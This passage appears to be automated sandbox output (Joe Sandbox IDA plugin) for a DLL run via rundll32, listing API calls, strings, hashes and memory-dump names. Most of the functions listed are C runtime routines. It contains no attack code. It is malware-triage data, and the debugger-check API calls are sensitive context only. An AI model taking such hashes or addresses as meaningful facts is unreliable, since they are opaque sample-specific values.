          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
          • String ID:
          • API String ID: 254469556-0
          • Opcode ID: 588eed875de7223cd4f2626a6f06dcf3df269ee39b9bca1968800e54a0b46efe
          • Instruction ID: 32477e9d00b7044540c70715709409ee0d46cb13a6014b7c66bede680ffdc3f3
          • Opcode Fuzzy Hash: 588eed875de7223cd4f2626a6f06dcf3df269ee39b9bca1968800e54a0b46efe
          • Instruction Fuzzy Hash: 143118B5D1521CDBDB50DFA4D989BCDBBB8AF08705F1040EAE449AB280EB745A84CF44
          APIs
          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E4E9918
          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E4E9922
          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6E4E992F
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: ExceptionFilterUnhandled$DebuggerPresent
          • String ID:
          • API String ID: 3906539128-0
          • Opcode ID: d3c3015db336c94551ad6c378144cfe995ec788cae9ea8d15068b47aa210446b
          • Instruction ID: ab800abeca5c0a11e1f4cee5f7bfa444adceb1e5cbb774a367005a3fcbc9c0b1
          • Opcode Fuzzy Hash: d3c3015db336c94551ad6c378144cfe995ec788cae9ea8d15068b47aa210446b
          • Instruction Fuzzy Hash: 0131E67491122C9BCF61DF64D888BCDBBB8BF48311F5041EAE91CA7291E7349B858F84
          APIs
          • GetCurrentProcess.KERNEL32(?,?,6E4EA253,?,00000001,?,?), ref: 6E4EA276
          • TerminateProcess.KERNEL32(00000000,?,6E4EA253,?,00000001,?,?), ref: 6E4EA27D
          • ExitProcess.KERNEL32 ref: 6E4EA28F
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: Process$CurrentExitTerminate
          • String ID:
          • API String ID: 1703294689-0
          • Opcode ID: aaf58d5e68c44427886be38ea1fe20235639386a3418f928dfafa4688329d447
          • Instruction ID: 610e41355d0a39076f0ca3ee8681adf9624adf4d9a9953f5a5b4ecb7ce864dab
          • Opcode Fuzzy Hash: aaf58d5e68c44427886be38ea1fe20235639386a3418f928dfafa4688329d447
          • Instruction Fuzzy Hash: 83E0BF31410544EFCF517BB4E818E493B79FF45642B504455F80696A21CB36DD91EAD1
          APIs
          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E4F1AAC,?,?,00000008,?,?,6E4F1744,00000000), ref: 6E4F1CDE
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: ExceptionRaise
          • String ID:
          • API String ID: 3997070919-0
          • Opcode ID: 4d84e2fd0470c4701f5cbd5cd44393f85f65270579d369960e42efae8b186c29
          • Instruction ID: 983e73ea0ca2cbaca6ccd37f1c2f6626488009b767a916e6b1ddec604eab5a67
          • Opcode Fuzzy Hash: 4d84e2fd0470c4701f5cbd5cd44393f85f65270579d369960e42efae8b186c29
          • Instruction Fuzzy Hash: C5B15671210609CFD704CF68C496F557BA0FF85764F25865AE8AACF3A2C335E986CB40
          APIs
          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E4E70BD
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: FeaturePresentProcessor
          • String ID:
          • API String ID: 2325560087-0
          • Opcode ID: 7e6f39c48e328b1de9095a980625a8a15d469eea73790a9f1a3bdaec7edf1784
          • Instruction ID: 93ba39721c78ad322ee8284636ef8ce88d47b480d21a4ccbe25bf2a671aff92b
          • Opcode Fuzzy Hash: 7e6f39c48e328b1de9095a980625a8a15d469eea73790a9f1a3bdaec7edf1784
          • Instruction Fuzzy Hash: 585169B1A047158FDB04CFA5E4C4B9AB7F0EF85725F20846AD902EB781D374A950CF60
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 39527355894c2f98fd81c3fddf34346f17a091da97b04ca3b9c3772dd133d5fd
          • Instruction ID: 314dfabe48de6cbc524831ab36d241826404243b0cad0db260cdcc663a308639
          • Opcode Fuzzy Hash: 39527355894c2f98fd81c3fddf34346f17a091da97b04ca3b9c3772dd133d5fd
          • Instruction Fuzzy Hash: A841A475804219AEDB20DFB9CC88EEABBB8AB45305F1442DEE41DE3604DA349E848F50
          APIs
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: HeapProcess
          • String ID:
          • API String ID: 54951025-0
          • Opcode ID: 8f4d3123c4ec4b868dc8c2b60d16151eaf00f9b7f20c3e12c9a51f4ed3dc572e
          • Instruction ID: 80bbf85feb809f736bec3823290cedec913da279f1ac953ccef92a74d878dc6f
          • Opcode Fuzzy Hash: 8f4d3123c4ec4b868dc8c2b60d16151eaf00f9b7f20c3e12c9a51f4ed3dc572e
          • Instruction Fuzzy Hash: 0AA02230202A00CF8F00AF30B32830C3AE8BACBEE230080A8E003C2280EB308030EB00
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
          • Instruction ID: 30442059450b15c47f72a619b91adedc468a4ddcead852fbbd162aa60eea2271
          • Opcode Fuzzy Hash: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
          • Instruction Fuzzy Hash: 6CE08C33A11228EBCB24CBE8C950E8AB3ECFB44B11B11449BF511E3604C270DE00C7D0
          APIs
          • ___free_lconv_mon.LIBCMT ref: 6E4EDE34
            • Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE24D
            • Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE25F
            • Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE271
            • Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE283
            • Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE295
            • Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE2A7
            • Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE2B9
            • Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE2CB
            • Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE2DD
            • Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE2EF
            • Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE301
            • Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE313
            • Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE325
          • _free.LIBCMT ref: 6E4EDE29
            • Part of subcall function 6E4EB90F: HeapFree.KERNEL32(00000000,00000000,?,6E4EAB0E), ref: 6E4EB925
            • Part of subcall function 6E4EB90F: GetLastError.KERNEL32(?,?,6E4EAB0E), ref: 6E4EB937
          • _free.LIBCMT ref: 6E4EDE4B
          • _free.LIBCMT ref: 6E4EDE60
          • _free.LIBCMT ref: 6E4EDE6B
          • _free.LIBCMT ref: 6E4EDE8D
          • _free.LIBCMT ref: 6E4EDEA0
          • _free.LIBCMT ref: 6E4EDEAE
          • _free.LIBCMT ref: 6E4EDEB9
          • _free.LIBCMT ref: 6E4EDEF1
          • _free.LIBCMT ref: 6E4EDEF8
          • _free.LIBCMT ref: 6E4EDF15
          • _free.LIBCMT ref: 6E4EDF2D
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
          • String ID: On
          • API String ID: 161543041-2957224786
          • Opcode ID: c1e1773b61b96a805fdfd28b352e8d8510fe8186f7c1b66e8cbc52f38f828ce0
          • Instruction ID: c178891b9863b2489760167cbfbb5369725a8e4f73011a040e2f7077bb6a76de
          • Opcode Fuzzy Hash: c1e1773b61b96a805fdfd28b352e8d8510fe8186f7c1b66e8cbc52f38f828ce0
          • Instruction Fuzzy Hash: A1316B71604B059FEB609EB8D844F9B73E8AF81356F11581FE099D7A94DF30ED508B60
          APIs
          • IsInExceptionSpec.LIBVCRUNTIME ref: 6E4E83BD
          • type_info::operator==.LIBVCRUNTIME ref: 6E4E83DF
          • ___TypeMatch.LIBVCRUNTIME ref: 6E4E84EE
          • IsInExceptionSpec.LIBVCRUNTIME ref: 6E4E85C0
          • _UnwindNestedFrames.LIBCMT ref: 6E4E8644
          • CallUnexpected.LIBVCRUNTIME ref: 6E4E865F
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
          • String ID: csm$csm$csm
          • API String ID: 2123188842-393685449
          • Opcode ID: 11a84ff56438661040f9e5162cae448e453253830e9996b8e9069bd11d07cbe1
          • Instruction ID: 0c07f0d98bb56358e085ca4478ad4d6c639f308eb610c6cf8f9fad5c5eeaca15
          • Opcode Fuzzy Hash: 11a84ff56438661040f9e5162cae448e453253830e9996b8e9069bd11d07cbe1
          • Instruction Fuzzy Hash: 73B15571804209EFCF09CFF4D880D9EBBB9FF48316B18495AE8116BA56D731DA52CB91
          APIs
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: 85189d3e94b1de6c4ae1cd4779f6ec955098eb15fdd033c9a489792000e9679f
          • Instruction ID: fbecfb540cf97d769c8ffa22f9853574009456102298221432c85534ebe3a412
          • Opcode Fuzzy Hash: 85189d3e94b1de6c4ae1cd4779f6ec955098eb15fdd033c9a489792000e9679f
          • Instruction Fuzzy Hash: 0421A97690420CAFCB51EFE4C880DDE7BB9BF08245F0145AAF5559B525EB31EB44DB80
          APIs
          • _ValidateLocalCookies.LIBCMT ref: 6E4E7C47
          • ___except_validate_context_record.LIBVCRUNTIME ref: 6E4E7C4F
          • _ValidateLocalCookies.LIBCMT ref: 6E4E7CD8
          • __IsNonwritableInCurrentImage.LIBCMT ref: 6E4E7D03
          • _ValidateLocalCookies.LIBCMT ref: 6E4E7D58
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
          • String ID: csm
          • API String ID: 1170836740-1018135373
          • Opcode ID: 7edcb0b0895d91b98426caa2d2023f65695e649ae213008fea50837eab416127
          • Instruction ID: 784767e2998d0acd2c5e9c64c6a07b2c5d7c0984fc2b30612e3a57b35d1501eb
          • Opcode Fuzzy Hash: 7edcb0b0895d91b98426caa2d2023f65695e649ae213008fea50837eab416127
          • Instruction Fuzzy Hash: 054193349041099FCF00CFB8D884E9E7BB9FF45329F14849AE9145B792D7319A56CBD1
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID:
          • String ID: api-ms-$ext-ms-
          • API String ID: 0-537541572
          • Opcode ID: 58e1b6f226e08f73c52fcc5413194ba4d58795a28a99e1d22ab591a0d911879a
          • Instruction ID: fb5a11607b100df5050d42999cfa725e529e507bd1b958b179243a5b668381dc
          • Opcode Fuzzy Hash: 58e1b6f226e08f73c52fcc5413194ba4d58795a28a99e1d22ab591a0d911879a
          • Instruction Fuzzy Hash: C521F932B45691EFCB119BFD9C40F1A3B69AF42BA2F120552E811EF780D670EC00C6E0
          APIs
            • Part of subcall function 6E4EE397: _free.LIBCMT ref: 6E4EE3BC
          • _free.LIBCMT ref: 6E4EE41D
            • Part of subcall function 6E4EB90F: HeapFree.KERNEL32(00000000,00000000,?,6E4EAB0E), ref: 6E4EB925
            • Part of subcall function 6E4EB90F: GetLastError.KERNEL32(?,?,6E4EAB0E), ref: 6E4EB937
          • _free.LIBCMT ref: 6E4EE428
          • _free.LIBCMT ref: 6E4EE433
          • _free.LIBCMT ref: 6E4EE487
          • _free.LIBCMT ref: 6E4EE492
          • _free.LIBCMT ref: 6E4EE49D
          • _free.LIBCMT ref: 6E4EE4A8
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
          • Instruction ID: c5bc92bbf143b960fbadff0226d73f05660827e3270e299d74b80c580fe63759
          • Opcode Fuzzy Hash: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
          • Instruction Fuzzy Hash: 0F11EC71544F08AAD631ABF0CC85FCB7F9CAF04706F404C1EA399A6998DB66FA148694
          APIs
          • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6E4EF2A4
          • __fassign.LIBCMT ref: 6E4EF489
          • __fassign.LIBCMT ref: 6E4EF4A6
          • WriteFile.KERNEL32(?,6E4ED927,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E4EF4EE
          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E4EF52E
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E4EF5D6
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: FileWrite__fassign$ConsoleErrorLastOutput
          • String ID:
          • API String ID: 1735259414-0
          • Opcode ID: 7db82080b386608e509b8a0ee49e8c0935b921c69a219fb95da8312ba621a2d6
          • Instruction ID: 43adde79bdc237c48559575a26306b26a8cc9321a02c71ee51943bf9679551b6
          • Opcode Fuzzy Hash: 7db82080b386608e509b8a0ee49e8c0935b921c69a219fb95da8312ba621a2d6
          • Instruction Fuzzy Hash: FFC1AB71D022588FCB10CFF8E8809EDBBB5BF59318F28416AE815B7742D6319902CF60
          APIs
          • GetLastError.KERNEL32(00000001,?,6E4E7B9E,6E4E68B4,6E4E6D4B,?,6E4E6F85,?,00000001,?,?,00000001,?,6E4FC7F8,0000000C,6E4E707E), ref: 6E4E7F97
          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E4E7FA5
          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E4E7FBE
          • SetLastError.KERNEL32(00000000,6E4E6F85,?,00000001,?,?,00000001,?,6E4FC7F8,0000000C,6E4E707E,?,00000001,?), ref: 6E4E8010
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: ErrorLastValue___vcrt_
          • String ID:
          • API String ID: 3852720340-0
          • Opcode ID: c5389a214af719e5886047e3e69c184cb4e566272caa765644ccf576059d2c51
          • Instruction ID: e835c9e8690ff804bfcc6ab0f7d1522f44cbe7bb363666e9c7fbfb5479092837
          • Opcode Fuzzy Hash: c5389a214af719e5886047e3e69c184cb4e566272caa765644ccf576059d2c51
          • Instruction Fuzzy Hash: EB01D83311C6226DAA652AF47CC8E572A59DB86B7F3210F6FF120859D5EF53481171C4
          Strings
          • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E4EC180
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID:
          • String ID: C:\Windows\SysWOW64\rundll32.exe
          • API String ID: 0-2837366778
          • Opcode ID: 52f3ccd079f20d38b35bb16dcb0e07cfbfc452db2610608eb599883ffa707967
          • Instruction ID: 40339ce6d8facc59e76980bbff54ee1739f286eae4ae544e6c10a203f05f13af
          • Opcode Fuzzy Hash: 52f3ccd079f20d38b35bb16dcb0e07cfbfc452db2610608eb599883ffa707967
          • Instruction Fuzzy Hash: 7A21A771A14646AFDB109FF99C80DAB7B6DAF8136A710491BF825DBA44E730EC1087E1
          APIs
          • FreeLibrary.KERNEL32(00000000,?,?,6E4E90B8,00000000,?,00000001,00000000,?,6E4E912F,00000001,FlsFree,6E4F6E3C,FlsFree,00000000), ref: 6E4E9087
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: FreeLibrary
          • String ID: api-ms-
          • API String ID: 3664257935-2084034818
          • Opcode ID: 6a8fe43c421d66abb52ea570a3b7e2c0e9f5772e6bb33da264864765039c40f2
          • Instruction ID: 1b7b40eb87d5e7177b630716c05183dd71d49114fa242483bc3a9a191eaf12c8
          • Opcode Fuzzy Hash: 6a8fe43c421d66abb52ea570a3b7e2c0e9f5772e6bb33da264864765039c40f2
          • Instruction Fuzzy Hash: 99110A32A55621AFDF12AFF8AC40F5933A89F42B71F510292EB12E77C4D771E90086E1
          APIs
          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E4EA28B,?,?,6E4EA253,?,00000001,?), ref: 6E4EA2EE
          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E4EA301
          • FreeLibrary.KERNEL32(00000000,?,?,6E4EA28B,?,?,6E4EA253,?,00000001,?), ref: 6E4EA324
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: AddressFreeHandleLibraryModuleProc
          • String ID: CorExitProcess$mscoree.dll
          • API String ID: 4061214504-1276376045
          • Opcode ID: a8c38a204ecf959581e46280ddfb415f1a1ea12e8a63b783b4b717caea6bd6d3
          • Instruction ID: 877b47147046ef65a8b159052d557c6074e309242971430d227f144ef6845cd6
          • Opcode Fuzzy Hash: a8c38a204ecf959581e46280ddfb415f1a1ea12e8a63b783b4b717caea6bd6d3
          • Instruction Fuzzy Hash: 4FF01231911519FBDF01AFB1E919F9E7A79EF81B56F104095E802E2250CB318A11EBE1
          APIs
          • _free.LIBCMT ref: 6E4EE346
            • Part of subcall function 6E4EB90F: HeapFree.KERNEL32(00000000,00000000,?,6E4EAB0E), ref: 6E4EB925
            • Part of subcall function 6E4EB90F: GetLastError.KERNEL32(?,?,6E4EAB0E), ref: 6E4EB937
          • _free.LIBCMT ref: 6E4EE358
          • _free.LIBCMT ref: 6E4EE36A
          • _free.LIBCMT ref: 6E4EE37C
          • _free.LIBCMT ref: 6E4EE38E
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
